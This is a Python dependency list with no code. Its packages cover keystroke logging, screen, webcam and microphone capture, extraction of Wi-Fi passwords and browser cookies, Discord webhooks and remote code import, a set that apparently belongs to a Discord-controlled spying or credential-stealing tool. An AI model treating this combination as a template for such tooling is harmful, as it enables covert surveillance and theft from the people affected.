dhooks
psutil
pycaw
passax
pycryptodome
pynput
pywin32
WMI
discord_webhook
discord==1.7.3
discord-components==2.1.2
discord-py-slash-command==3.0.3
aiohttp==3.8.1
asyncio
pypiwin32
pyautogui
colorama
opencv-python==4.5.3.56
comtypes
mss
image
Pillow
requests
wget
pyinstaller==5.1
pymyfile
maskpass
keyboard
pyotp
pyasn1
sounddevice
scipy
wifipasswords
cookies_package
httpimport
protobuf
httpx
